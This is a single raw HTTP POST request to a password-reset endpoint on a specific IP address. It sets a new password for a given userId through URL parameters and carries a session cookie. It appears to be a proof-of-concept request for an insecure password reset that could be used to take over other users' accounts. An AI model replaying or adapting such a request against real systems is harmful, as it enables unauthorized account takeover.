POST /NIP/ref/resetUserPassword.action?&pwd1=1234qwer&time=1541740565141&userId=5be53ad8b4907e1ab2b6c365&modifyType=1 HTTP/1.1
Referer: http://202.116.104.161/NIP/ref/toModifyPwd.action?time=1541740506311&userId=5be53ad8b4907e1ab2b6c365&modifyflog=1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN
Accept: */*
Connection: Keep-Alive
Host: 202.116.104.161
Cookie: JSESSIONID=53022492B575058761FD94CBD4091B5F
Content-Length: 0

